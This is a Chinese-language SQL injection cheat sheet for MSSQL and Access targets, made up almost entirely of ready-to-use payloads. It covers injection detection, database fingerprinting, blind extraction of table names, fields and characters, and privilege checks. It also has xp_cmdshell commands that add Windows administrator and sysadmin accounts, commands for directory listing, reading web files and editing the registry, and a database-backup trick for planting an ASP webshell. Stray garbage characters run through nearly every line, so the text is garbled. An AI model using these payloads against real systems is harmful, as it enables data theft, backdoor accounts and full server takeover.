1.判断是否有注入;and 1=1 ;and 1=2 aj�n-�KG!A
2.初步判断是否是mssql ;and user>0 _Q��R�
g7�
8>�U�KI�dp
3.注入参数是字符'and [查询条件] and ''=' �Fr-�[UZ~V
:GQ�UM��6
4.搜索时没过滤参数的'and [查询条件] and '%25'=' I4)�Nb� WQ
?75\>�NiR�
5.判断数据库系统 Dp*:Q){>�E
8q?;�2w\l
;and (select count(*) from sysobjects)>0 mssql �>']+Or�QH
C"w,('~@kW
;and (select count(*) from msysobjects)>0 access �GDF{Lf)/v
��N�B E�pM
$ye^u�u;Z
x��X�F2"+
6.猜数据库 ;and (select Count(*) from [数据库名])>0 (NX���)o�P
��]}P�l%.�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [ S5bj�]D
[#p&D~D�u&
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 >D�L/�.��.
jm[�}M���
9.(1)猜字段的ascii值(access) w�L;�]1&Qq
lDo(�@�nM
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Bwj�g#1�E
$^�t�<9"�t
(2)猜字段的ascii值(mssql) ��,�Ij�=�b
���#wF���1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 D�y su{�rL
�p ZtgIS(3
10.测试权限结构(mssql) lLH$�`Wnv�
z�K=d�zoy�
�l '/N�3&5
3[�VWTq)D=
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [*<.?9n)or
�(vKI1^,
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- � �}mKwFVZ
$,�TGP+vH�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- :�/B�:FY�=
{�VR�`;��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- (� :�{"C6x
�NS@{~;�#R
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- sGSsUO:@j;
�VB�M/x|'�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �J{d(1g�SZ
U��R}k�B&t
;and 1=(select IS_MEMBER('db_owner'));-- �K�"L_`.&Q
U�
IfH*�6X
"3SW�O3�-x
�AM'gnP�>�
11.添加mssql和系统的帐户 �*�8P�N!�^
�q/$�GE,"�
;exec master.dbo.sp_addlogin username;-- vv� &BhIf3
;exec master.dbo.sp_password null,username,password;-- �1]�j���^d
�> @��+��#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��X(]Z���r
!i�^]UN ��
;exec master.dbo.xp_cmdshell 'net user username password ���}q�AVN
L1wZ�U,�o
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- P.c�O6+jGR
��j�eq��:�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- RX�'-9�9�M
w�:}C�8WKw
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 3q�tr�9NI
�vf<UBa;Xm
�M� ?*Tf&
�Gg|�M+M?+
12.(1)遍历目录 lyyX<=E{)
�^�_68]l=
;create table dirs(paths varchar(100), id int) ��O�+_�N!/
�ZHCr2^w6
;insert dirs exec master.dbo.xp_dirtree 'c:\' Q[�u�AIyv0
�77*�q�kKr
;and (select top 1 paths from dirs)>0 cx�{T �
'1
4�O(@'#LLz
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) r,4lqar;�E
OE�nDsIhq
W5.�V�a�.�
d��AL3.��%
(2)遍历目录 �cD2�+hp|9
&Yf",KcL*I
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- n_P��3\Y|�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��qaG#��;
�hL!QL�iF:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 !,�N�wts>m
1�CkdpYjsj
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 mi�bp�G9+d
V�YaS�B?`/
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 j)Y[�4 ^k^
+{$QAjW(�/
�\�3�zp)J
rQJ"&CapT�
13.mssql中的存储过程 �K"\�M��U�
��Hm�
fX�e
xp_regenumvalues 注册表根键, 子键 w�z�h�]97b
�GX��?�*�1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �Km!nM$=�k
R*�9�NR,�C
xp_regread 根键,子键,键值名 wAFW*rO5o�
v$Uhm</|19
;exec xp_regread `ZM�K9f�:�
u[")*�\�CP
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �S@�xXq{j�
pzhl*�ss"6
xp_regwrite 根键,子键, 值名, 值类型, 值 �nN��aXp*J
RV+E^pk�p$
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 q�+ p�OrGh
�U>�P�|X=)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �\4{2��eU
���qa��Vy.
xp_regdeletevalue 根键,子键,值名 ��;:��mu}
DG[%�N�hle
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !tXZ%BP.�u
PB9�/m�-\H
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 u�P@\#/4u
�2r&R"B1`(
�_�w(ln9��
x�x)-d,S��
14.mssql的backup创建webshell }T.?c9l �X
?D|\]0�e�N
use model k6(r !�mc�
�h2w}wsb0l
create table cmd(str image); C4\�,�z�\Q
<G�~>�~L.E
insert into cmd(str) values (''); $bsH$N#6T�
�{G�3i0�r
backup database model to disk='c:\l.asp'; �r�NlW7�Y
E4i0i!<�z�
QA;!�caNp�
3s*(uS��(
15.mssql内置函数 �W3rl^M=r�
e�ZL�MP��
;and (select @@version)>0 获得Windows的版本号 + G;L��X'B
i�Y0>lDFm.
;and user_name()='dbo' 判断当前系统的连接用户是不是sa aWy]9F�&C:
z�;����Q<F
;and (select user_name())>0 爆当前系统的连接用户 2i7e��#���
8�)yI�<`q6
;and (select db_name())>0 得到当前连接的数据库 5$rS�EVg9
h�}L�}[�
�
L]d-33.c!H
EQ<RDh�C@b
16.简洁的webshell nSx]QRE�L!
�
Paj vb-f
use model r~7:daG��*
M�4m$\~z�f
create table cmd(str image); �hs+kr?Pg`
T
vtm`Yk\�
insert into cmd(str) values (''); {�9LWUCpsf
�Bs��;��|D
backup database model to disk='g:\wwwtest\l.asp';
